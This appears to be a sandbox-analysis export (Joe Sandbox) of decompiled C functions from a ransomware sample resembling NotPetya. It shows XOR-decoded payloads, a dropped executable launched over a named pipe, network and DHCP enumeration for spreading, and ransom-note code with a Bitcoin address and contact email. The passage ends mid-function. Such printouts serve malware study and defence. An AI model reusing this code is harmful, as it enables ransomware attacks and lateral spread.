				if(_t61 != 0) {
					if(_t45 == 0) {
						 *((short*)(_t61 + 2)) = 0xf7ff;
						 *((short*)(_t61 + 4)) = E011E20B2();
						 *((short*)(_t61 + 6)) = E011E20B2();
					}
					if(_t45 == 1) {
						 *((char*)(_t61 + 8)) = 3;
						 *((char*)(_t61 + 0x28)) = 3;
						_t51 = _t48 | 0xffffffff;
						 *((intOrPtr*)(_t61 + 0xa0)) = 0xffd000b0;
						 *(_t61 + 0xa4) = _t51;
						 *((intOrPtr*)(_t61 + 0xa8)) = 0xffd000b0;
						 *(_t61 + 0xac) = _t51;
						 *((intOrPtr*)(_t61 + 0xc0)) = 0xffdff0c0;
						 *((intOrPtr*)(_t61 + 0xc4)) = 0xffdff0c0;
						 *((intOrPtr*)(_t61 + 0x18c)) = 0xffdff190;
						 *((intOrPtr*)(_t61 + 0x194)) = 0xffdff1f0;
						 *((intOrPtr*)(_t61 + 0x1d8)) = 0xffd001f0;
						 *(_t61 + 0x1dc) = _t51;
						 *((intOrPtr*)(_t61 + 0x1e8)) = 0xffd00200;
						 *(_t61 + 0x1ec) = _t51;
						_t40 = 0;
						do {
							_t25 = _t40 + 0x11f23b0; // 0x5c8c0cfd
							 *(_t61 + _t40 + 0x1f1) =  *_t25 ^ 0x000000cc;
							_t40 = _t40 + 1;
						} while (_t40 < 0x977);
					}
					if(_t45 == 2) {
						_t37 = _t61;
						_t59 = 0x47b;
						do {
							 *_t37 =  *(0x11f2d27 + _t37) ^ 0x000000cc;
							_t37 =  &(_t37[1]);
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					_t34 = E011E688F(_a4, _t61, _v8); // executed
					E011E20D0( &_v12);
					_t36 = _t34;
				} else {
					_t36 = _t33 | 0xffffffff;
				}
				return _t36;
			}

















    0x011e3ca0
    0x011e3ca3
    0x011e3ca4
    0x011e3ca5
    0x011e3caa
    0x011e3caf
    0x011e3cb1
    0x011e3cb1
    0x011e3cbb
    0x011e3cbd
    0x011e3cbd
    0x011e3cc7
    0x011e3cc9
    0x011e3cc9
    0x011e3cd3
    0x011e3cd8
    0x011e3cda
    0x011e3cdf
    0x011e3ceb
    0x011e3cf2
    0x011e3cfb
    0x011e3d04
    0x011e3d04
    0x011e3d0b
    0x011e3d11
    0x011e3d15
    0x011e3d19
    0x011e3d21
    0x011e3d27
    0x011e3d2d
    0x011e3d33
    0x011e3d3e
    0x011e3d44
    0x011e3d4a
    0x011e3d54
    0x011e3d5e
    0x011e3d68
    0x011e3d6e
    0x011e3d78
    0x011e3d7e
    0x011e3d80
    0x011e3d80
    0x011e3d89
    0x011e3d90
    0x011e3d91
    0x011e3d80
    0x011e3d9c
    0x011e3da3
    0x011e3da7
    0x011e3dac
    0x011e3db2
    0x011e3db4
    0x011e3db5
    0x011e3db5
    0x011e3dac
    0x011e3dbf
    0x011e3dc9
    0x011e3dce
    0x011e3ce1
    0x011e3ce1
    0x011e3ce1
    0x011e3dd4

    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7545, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 193
    C-Code - Quality: 70%
    			E011E7545() {
				char _v8;
				long _v12;
				WCHAR* _v16;
				char _v20;
				void* _v24;
				void* _v36;
				WCHAR* _v40;
				struct _PROCESS_INFORMATION _v56;
				struct _STARTUPINFOW _v124;
				short _v1684;
				short _v2724;
				void _v4772;
				short _v6820;
				void* __ebx;
				void* __esi;
				_Unknown_base(*)()* _t54;
				void* _t59;
				WCHAR** _t62;
				int _t67;
				WCHAR** _t69;
				WCHAR** _t71;
				void* _t73;
				void* _t77;
				char* _t78;
				int _t95;
				WCHAR* _t102;
				intOrPtr _t108;
				intOrPtr _t109;
				void* _t110;
				int _t114;
				void* _t115;
				intOrPtr _t117;

				E011EA4F0(0x1aa0);
				_t102 = 0;
				_v12 = 0;
				_v8 = 0;
				_t115 = GetCurrentProcess();
				_v20 = 0;
				_t54 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process");
				if(_t54 != 0) {
					_t107 =  &_v20;
					 *_t54(_t115,  &_v20);
				}
				if(FindResourceW( *0x11ff120, (0 | _v20 != _t102) + 1, 0xa) == _t102) {
					_t59 = 0;
				} else {
					_t59 = E011E85D0( &_v12, _t107,  &_v8, _t58); // executed
					_t102 = 0;
				}
				if(_t59 != _t102) {
					if(GetTempPathW(0x208,  &_v2724) == 0) {
						L20:
						_t108 = _v8;
						_t62 = _v12;
						if(_t108 == _t102) {
							L22:
							return HeapFree(GetProcessHeap(), _t102, _v12);
						} else {
							goto L21;
						}
						do {
							L21:
							 *_t62 = _t102;
							_t62 =  &(_t62[0]);
							_t108 = _t108 - 1;
						} while (_t108 != 0);
						goto L22;
					}
					_t67 = GetTempFileNameW( &_v2724, _t102, _t102,  &_v1684); // executed
					if(_t67 == _t102) {
						goto L20;
					}
					_v40 = _t102;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t69 =  &_v40;
					__imp__CoCreateGuid(_t69, _t110); // executed
					if(_t69 < 0) {
						L19:
						goto L20;
					}
					_t71 =  &_v40;
					_v16 = _t102;
					__imp__StringFromCLSID(_t71,  &_v16); // executed
					if(_t71 < 0) {
						goto L19;
					}
					_t73 = E011E73AE(_v8,  &_v1684, _v12); // executed
					if(_t73 == 0) {
						L18:
						__imp__CoTaskMemFree(_v16);
						_t102 = 0;
						goto L19;
					}
					wsprintfW( &_v4772, L"\\\\.\\pipe\\%ws", _v16);
					_t77 = CreateThread(0, 0, E011E73FD,  &_v4772, 0, 0); // executed
					_v24 = _t77;
					if(_t77 != 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t114 = 0x44;
						memset( &_v124, 0, _t114);
						_v124.wShowWindow = 0;
						_v124.cb = _t114;
						wsprintfW( &_v6820, L"\"%ws\" %ws",  &_v1684,  &_v4772);
						_t95 = CreateProcessW( &_v1684,  &_v6820, 0, 0, 0, 0x8000000, 0, 0,  &_v124,  &_v56); // executed
						if(_t95 != 0) {
							WaitForSingleObject(_v56, 0xea60);
							_t117 =  *0x11ff108; // 0x2e6710
							E011E70FA(_t117);
							TerminateThread(_v24, 0); // executed
						}
						CloseHandle(_v24);
					}
					_t109 = _v8;
					_t78 = _v12;
					if(_t109 == 0) {
						L17:
						E011E73AE(_v8,  &_v1684, _v12); // executed
						DeleteFileW( &_v1684); // executed
						goto L18;
					} else {
						do {
							 *_t78 = 0;
							_t78 = _t78 + 1;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L17;
					}
				}
				return _t59;
			}



































    0x011e754d
    0x011e7553
    0x011e7556
    0x011e7559
    0x011e756c
    0x011e756e
    0x011e7578
    0x011e7580
    0x011e7582
    0x011e7587
    0x011e7587
    0x011e75a3
    0x011e75b6
    0x011e75a5
    0x011e75ad
    0x011e75b2
    0x011e75b2
    0x011e75ba
    0x011e75d4
    0x011e7756
    0x011e7756
    0x011e7759
    0x011e775e
    0x011e7766
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e7760
    0x011e7760
    0x011e7760
    0x011e7762
    0x011e7763
    0x011e7763
    0x00000000
    0x011e7760
    0x011e75ea
    0x011e75f2
    0x00000000
    0x00000000
    0x011e75fb
    0x011e7601
    0x011e7602
    0x011e7603
    0x011e7604
    0x011e7608
    0x011e7610
    0x011e7755
    0x00000000
    0x011e7755
    0x011e761a
    0x011e761e
    0x011e7621
    0x011e7629
    0x00000000
    0x00000000
    0x011e763c
    0x011e7643
    0x011e774a
    0x011e774d
    0x011e7753
    0x00000000
    0x011e7753
    0x011e765e
    0x011e7675
    0x011e767b
    0x011e7680
    0x011e768b
    0x011e768c
    0x011e768d
    0x011e7690
    0x011e7691
    0x011e7698
    0x011e769f
    0x011e76bd
    0x011e76c0
    0x011e76e5
    0x011e76ed
    0x011e76f7
    0x011e76fd
    0x011e7703
    0x011e770c
    0x011e770c
    0x011e7715
    0x011e7715
    0x011e771b
    0x011e771e
    0x011e7723
    0x011e772b
    0x011e7738
    0x011e7744
    0x00000000
    0x011e7725
    0x011e7725
    0x011e7725
    0x011e7727
    0x011e7728
    0x011e7728
    0x00000000
    0x011e7725
    0x011e7723
    0x011e777a

    APIs
    • GetCurrentProcess.KERNEL32(?,76E6DE72,?,011E7EB2), ref: 011E755C
    • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,76E6DE72,?,011E7EB2), ref: 011E7571
    • GetProcAddress.KERNEL32(00000000,?,76E6DE72,?,011E7EB2), ref: 011E7578
    • IsWow64Process.KERNELBASE(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E7587
    • FindResourceW.KERNEL32(00000001,0000000A), ref: 011E759B
    • HeapFree.KERNEL32(00000000,?,76E6DE72), ref: 011E7771
      • Part of subcall function 011E85D0: LoadResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85E2
      • Part of subcall function 011E85D0: LockResource.KERNEL32(00000000,?,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E85F2
      • Part of subcall function 011E85D0: SizeofResource.KERNEL32(002F1C10,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8607
      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E861F
      • Part of subcall function 011E85D0: RtlAllocateHeap.NTDLL(00000000,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?,?), ref: 011E8622
      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000000,?,00000000,002F1C10,-00000004,000000C1,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?), ref: 011E8665
      • Part of subcall function 011E85D0: HeapFree.KERNEL32(00000000), ref: 011E8668
    • GetTempPathW.KERNEL32(00000208,?), ref: 011E75CC
    • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E75EA
    • CoCreateGuid.OLE32(?), ref: 011E7608
    • StringFromCLSID.OLE32(?,?), ref: 011E7621
      • Part of subcall function 011E73AE: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 011E73C4
      • Part of subcall function 011E73AE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E73DE
      • Part of subcall function 011E73AE: CloseHandle.KERNEL32(00000000), ref: 011E73EF
    • wsprintfW.USER32 ref: 011E765E
    • CreateThread.KERNEL32(00000000,00000000,011E73FD,?,00000000,00000000), ref: 011E7675
    • memset.MSVCRT ref: 011E7698
    • wsprintfW.USER32 ref: 011E76C0
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E76E5
    • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 011E76F7
      • Part of subcall function 011E70FA: EnterCriticalSection.KERNEL32(002E6710,011E7EBD), ref: 011E70FF
      • Part of subcall function 011E70FA: InterlockedExchange.KERNEL32(002E6738,00000001), ref: 011E710B
      • Part of subcall function 011E70FA: LeaveCriticalSection.KERNEL32(002E6710), ref: 011E7112
    • TerminateThread.KERNELBASE(?,00000000), ref: 011E770C
    • CloseHandle.KERNEL32(?), ref: 011E7715
    • DeleteFileW.KERNELBASE(?,?,?), ref: 011E7744
    • CoTaskMemFree.OLE32(?), ref: 011E774D
    • GetProcessHeap.KERNEL32(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E776A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8E7F, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 158
    C-Code - Quality: 67%
    			E011E8E7F(intOrPtr* _a4, void* _a8, int _a16, void _a20, int _a4112, void _a4116) {
				int _v0;
				int _v4;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __esi;
				void* _t69;
				void* _t73;
				void* _t75;
				signed int _t77;
				signed int _t80;
				void _t81;
				void* _t84;
				void* _t93;
				void* _t100;
				struct _SECURITY_ATTRIBUTES* _t101;
				signed int _t105;
				signed int _t108;
				signed int _t109;
				void* _t110;
				intOrPtr* _t112;
				intOrPtr* _t113;
				void* _t114;
				intOrPtr* _t115;
				void* _t117;
				signed int _t122;
				void* _t125;

				E011EA4F0(0x3014);
				_t101 = 0;
				_a16 = 0;
				memset( &_a20, 0, 0xffc);
				_a4112 = 0;
				memset( &_a4116, 0, 0x1ffc);
				_t115 = __imp__GetAdaptersInfo;
				_t125 = (_t122 & 0xfffffff8) + 0x18;
				_a8 = 0;
				_v4 = 0;
				_v0 = 0;
				_t69 =  *_t115(0,  &_a8, _t110, _t114, _t100); // executed
				if(_t69 != 0x6f) {
					L23:
					return 0;
				}
				_t112 = LocalAlloc(0x40, _v0);
				_a4 = _t112;
				if(_t112 == 0) {
					goto L23;
				}
				_t73 =  *_t115(_t112,  &_v0); // executed
				if(_t73 != 0) {
					L22:
					LocalFree(_v4);
					goto L23;
				}
				while(_v20 < 0x400) {
					if( *((intOrPtr*)(_t112 + 0x1a4)) != _t101) {
						_t28 = _t112 + 0x200; // 0x200
						_t93 = E011E6916(_t28);
						_v24 = _t93;
						if(_t93 != _t101) {
							E011E6FC7(_t93, 0, _a4);
							HeapFree(GetProcessHeap(), _t101, _v24);
						}
					}
					_t112 =  *_t112;
					_v28 = _v28 + 1;
					if(_t112 != _t101) {
						continue;
					}
					break;
				}
				_t75 = E011E8243(_t103); // executed
				if(_t75 != 0) {
					E011E908A(_a4);
				}
				if(_v20 <= _t101) {
					L20:
					if(_v16 <= _t101) {
						goto L22;
					} else {
						goto L21;
					}
					do {
						L21:
						CloseHandle( *(_t125 + 0x20 + _t101 * 4));
						_t101 =  &(_t101->nLength);
					} while (_t101 < _v16);
					goto L22;
				} else {
					_t113 = __imp__#14;
					do {
						_t77 = LocalAlloc(0x40, 0xc);
						_t117 = _t77;
						if(_t117 != _t101) {
							__imp__#11("255.255.255.255");
							_t108 = _v20;
							_t109 =  *(_t125 + 0x1024 + _t108 * 8);
							_t105 =  *(_t125 + 0x1020 + _t108 * 8) & _t109;
							if(_t105 != 0) {
								_t80 = _t77 ^ _t109 | _t105;
								_v16 = _t80;
								if(_t80 != 0) {
									_t81 =  *_t113(_t105);
									 *_t117 = _t81;
									 *((intOrPtr*)(_t117 + 4)) =  *_t113(_v20);
									 *((intOrPtr*)(_t117 + 8)) = _a4;
									_t84 = CreateThread(_t101, _t101, E011E8E04, _t117, _t101, _t101); // executed
									if(_t84 != _t101) {
										 *(_t125 + 0x20 + _v32 * 4) = _t84;
									}
								}
							}
						}
						_v16 = _v16 + 1;
					} while (_v16 < _v20);
					goto L20;
				}
			}
































    0x011e8e8a
    0x011e8e92
    0x011e8e9f
    0x011e8ea3
    0x011e8eb9
    0x011e8ec0
    0x011e8ec5
    0x011e8ecb
    0x011e8ed4
    0x011e8ed8
    0x011e8edc
    0x011e8ee0
    0x011e8ee5
    0x011e907f
    0x011e9087
    0x011e9087
    0x011e8ef7
    0x011e8ef9
    0x011e8eff
    0x00000000
    0x00000000
    0x011e8f0b
    0x011e8f0f
    0x011e9075
    0x011e9079
    0x00000000
    0x011e9079
    0x011e8f15
    0x011e8f88
    0x011e8f8a
    0x011e8f91
    0x011e8f96
    0x011e8f9c
    0x011e8fa3
    0x011e8fb4
    0x011e8fb4
    0x011e8f9c
    0x011e8fba
    0x011e8fbc
    0x011e8fc2
    0x00000000
    0x00000000
    0x00000000
    0x011e8fc2
    0x011e8fc8
    0x011e8fcf
    0x011e8fd4
    0x011e8fd4
    0x011e8fdd
    0x011e905e
    0x011e9062
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e9064
    0x011e9064
    0x011e9068
    0x011e906e
    0x011e906f
    0x00000000
    0x011e8fdf
    0x011e8fdf
    0x011e8fe5
    0x011e8fe9
    0x011e8fef
    0x011e8ff3
    0x011e8ffa
    0x011e9000
    0x011e900b
    0x011e9012
    0x011e9014
    0x011e9018
    0x011e901a
    0x011e901e
    0x011e9021
    0x011e9027
    0x011e9033
    0x011e903b
    0x011e903e
    0x011e9046
    0x011e904c
    0x011e904c
    0x011e9046
    0x011e901e
    0x011e9014
    0x011e9050
    0x011e9058
    0x00000000
    0x011e8fe5

    APIs
    • memset.MSVCRT ref: 011E8EA3
    • memset.MSVCRT ref: 011E8EC0
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 011E8EE0
    • LocalAlloc.KERNEL32(00000040,?), ref: 011E8EF1
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 011E8F0B
    • inet_addr.WS2_32(000001B0), ref: 011E8F30
    • inet_addr.WS2_32(000001C0), ref: 011E8F44
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
      • Part of subcall function 011E6916: GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
      • Part of subcall function 011E6916: HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 011E8F75
    • HeapFree.KERNEL32(00000000), ref: 011E8F7C
    • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 011E8FAD
    • HeapFree.KERNEL32(00000000), ref: 011E8FB4
      • Part of subcall function 011E8243: NetServerGetInfo.NETAPI32(00000000,00000065,?,73389263,?,?,011E8FCD), ref: 011E8254
      • Part of subcall function 011E8243: NetApiBufferFree.NETAPI32(?,?,?,011E8FCD), ref: 011E8277
    • CloseHandle.KERNEL32(?), ref: 011E9068
      • Part of subcall function 011E908A: GetComputerNameExW.KERNEL32(00000004,?,?,00000000,73389263,00000000), ref: 011E90D1
      • Part of subcall function 011E908A: DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 011E90F3
      • Part of subcall function 011E908A: DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 011E911F
      • Part of subcall function 011E908A: DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 011E9158
      • Part of subcall function 011E908A: htonl.WS2_32(00000000), ref: 011E9187
      • Part of subcall function 011E908A: htonl.WS2_32(00000000), ref: 011E9195
      • Part of subcall function 011E908A: inet_ntoa.WS2_32(00000000), ref: 011E9198
      • Part of subcall function 011E908A: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 011E91B6
      • Part of subcall function 011E908A: HeapFree.KERNEL32(00000000), ref: 011E91BD
      • Part of subcall function 011E908A: DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 011E91D2
      • Part of subcall function 011E908A: DhcpRpcFreeMemory.DHCPSAPI(?), ref: 011E91EB
    • LocalAlloc.KERNEL32(00000040,0000000C), ref: 011E8FE9
    • inet_addr.WS2_32(255.255.255.255), ref: 011E8FFA
    • htonl.WS2_32(?), ref: 011E9021
    • htonl.WS2_32(?), ref: 011E9029
    • CreateThread.KERNEL32(00000000,00000000,011E8E04,00000000,00000000,00000000), ref: 011E903E
    • LocalFree.KERNEL32(?), ref: 011E9079
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1D32, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 105
    C-Code - Quality: 100%
    			E011E1D32(WCHAR* _a4) {
				long _v8;
				void* _v12;
				short _v1572;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t27;
				intOrPtr* _t38;
				void* _t47;
				void* _t49;
				intOrPtr _t51;

				_t19 = E011E1BA0(_a4); // executed
				if(_t19 != 0) {
					_t21 = E011E1C7F(_a4);
					_v12 = _t21;
					if(_t21 == 0) {
						L11:
						return _t21;
					}
					if(PathCombineW( &_v1572, _a4, L"README.TXT") == 0) {
						L10:
						_t21 = LocalFree(_a4[0xc]);
						goto L11;
					}
					_t25 = E011E6973();
					if(_t25 != 0) {
						Sleep((_t25 - 1) * 0xea60); // executed
					}
					_t27 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0); // executed
					_t47 = _t27;
					if(_t47 == 0xffffffff) {
						L9:
						goto L10;
					} else {
						_v8 = 0;
						WriteFile(_t47, L"Ooops, your important files are encrypted.\r\n\r\nIf you see this text, then your files are no longer accessible, because\r\nthey have been encrypted. Perhaps you are busy looking for a way to recover\r\nyour files, but don\'t waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\nWe guarantee that you can recover all your files safely and easily.\r\nAll you need to do is submit the payment and purchase the decryption key.\r\n\r\nPlease follow the instructions:\r\n\r\n1.\tSend $300 worth of Bitcoin to following address:\r\n\r\n", 0x432,  &_v8, 0); // executed
						WriteFile(_t47, L"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX\r\n\r\n", 0x4c,  &_v8, 0); // executed
						WriteFile(_t47, L"2.\tSend your Bitcoin wallet ID and personal installation key to e-mail ", 0x8e,  &_v8, 0); // executed
						WriteFile(_t47, L"wowsmith123456@posteo.net.\r\n", 0x38,  &_v8, 0); // executed
						WriteFile(_t47, L"\tYour personal installation key:\r\n\r\n", 0x48,  &_v8, 0); // executed
						_t38 = _v12;
						_t49 = _t38 + 2;
						do {
							_t51 =  *_t38;
							_t38 = _t38 + 2;
						} while (_t51 != 0);
						WriteFile(_t47, _v12, (_t38 - _t49 >> 1) + (_t38 - _t49 >> 1),  &_v8, 0); // executed
						CloseHandle(_t47);
						goto L9;
					}
				}
				return _t19;
			}














    0x011e1d3e
    0x011e1d45
    0x011e1d4f
    0x011e1d56
    0x011e1d5b
    0x011e1e4c
    0x00000000
    0x011e1e4c
    0x011e1d78
    0x011e1e40
    0x011e1e46
    0x00000000
    0x011e1e46
    0x011e1d7e
    0x011e1d85
    0x011e1d8f
    0x011e1d8f
    0x011e1da8
    0x011e1dae
    0x011e1db3
    0x011e1e3f
    0x00000000
    0x011e1db9
    0x011e1dd0
    0x011e1dd3
    0x011e1de2
    0x011e1df4
    0x011e1e03
    0x011e1e12
    0x011e1e14
    0x011e1e17
    0x011e1e1a
    0x011e1e1a
    0x011e1e1d
    0x011e1e20
    0x011e1e35
    0x011e1e38
    0x00000000
    0x011e1e3e
    0x011e1db3
    0x011e1e4e

    APIs
      • Part of subcall function 011E1BA0: CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000,F0000000,?,?,?,?,011E1D43,?), ref: 011E1BC6
      • Part of subcall function 011E1BA0: LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,011E1D43,?), ref: 011E1BD6
      • Part of subcall function 011E1BA0: CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000,?,?,?,011E1D43,?), ref: 011E1BF8
      • Part of subcall function 011E1BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C1A
      • Part of subcall function 011E1BA0: LocalAlloc.KERNEL32(00000040,011E1D43,?,?,?,011E1D43,?), ref: 011E1C25
      • Part of subcall function 011E1BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C42
      • Part of subcall function 011E1BA0: CryptImportKey.ADVAPI32(5708458B,?,011E1D43,00000000,00000000,011E1D4F,?,?,?,011E1D43,?), ref: 011E1C5A
      • Part of subcall function 011E1BA0: LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C66
      • Part of subcall function 011E1BA0: LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C6F
      • Part of subcall function 011E1C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,011E1D54,F0000000,?), ref: 011E1CA6
      • Part of subcall function 011E1C7F: LocalAlloc.KERNEL32(00000040,?,?,011E1D54,F0000000,?), ref: 011E1CB1
      • Part of subcall function 011E1C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,011E1D54,F0000000,?), ref: 011E1CCC
      • Part of subcall function 011E1C7F: CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1CE8
      • Part of subcall function 011E1C7F: LocalAlloc.KERNEL32(00000040,F0000000,?,011E1D54,F0000000,?), ref: 011E1CF6
      • Part of subcall function 011E1C7F: CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1D0F
      • Part of subcall function 011E1C7F: LocalFree.KERNEL32(00000000,?,011E1D54,F0000000,?), ref: 011E1D1B
      • Part of subcall function 011E1C7F: LocalFree.KERNEL32(011E1D54,?,011E1D54,F0000000,?), ref: 011E1D24
    • PathCombineW.SHLWAPI(?,?,README.TXT), ref: 011E1D70
    • LocalFree.KERNEL32(?), ref: 011E1E46
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • Sleep.KERNELBASE(-00000001), ref: 011E1D8F
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 011E1DA8
    • WriteFile.KERNEL32(00000000,Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b,00000432,?,00000000), ref: 011E1DD3
    • WriteFile.KERNEL32(00000000,1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX,0000004C,?,00000000), ref: 011E1DE2
    • WriteFile.KERNEL32(00000000,2.Send your Bitcoin wallet ID and personal installation key to e-mail ,0000008E,?,00000000), ref: 011E1DF4
    • WriteFile.KERNEL32(00000000,wowsmith123456@posteo.net.,00000038,?,00000000), ref: 011E1E03
    • WriteFile.KERNEL32(00000000,Your personal installation key:,00000048,?,00000000), ref: 011E1E12
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E1E35
    • CloseHandle.KERNEL32(00000000), ref: 011E1E38
    Strings
    • Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b, xrefs: 011E1DCA
    • wowsmith123456@posteo.net., xrefs: 011E1DFD
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1D95
    • 2.Send your Bitcoin wallet ID and personal installation key to e-mail , xrefs: 011E1DEE
    • Your personal installation key:, xrefs: 011E1E0C
    • 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX, xrefs: 011E1DDC
    • README.TXT, xrefs: 011E1D61
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E94A5, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 81
    C-Code - Quality: 100%
    			E011E94A5(signed int _a4, long _a8, intOrPtr _a12, void* _a16) {
				long _v8;
				void* _v12;
				void* _v16;
				int _t16;
				struct HINSTANCE__* _t17;
				void* _t18;
				int _t19;
				void* _t22;
				void* _t24;

				_t16 = FreeLibrary( *0x11ff120); // executed
				 *0x11ff114 = _t16;
				if(_t16 == 0) {
					return _t16;
				}
				_t17 =  *0x11ff13c; // 0x11e0000
				 *0x11ff120 = _t17; // executed
				_t18 = CreateFileW(0x11ff148, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v12 = _t18;
				if(_t18 != 0) {
					_v8 = GetFileSize(_t18, 0);
					CloseHandle(_v12);
					_t22 = CreateFileW(0x11ff148, 0x40000000, 0, 0, 2, 0, 0); // executed
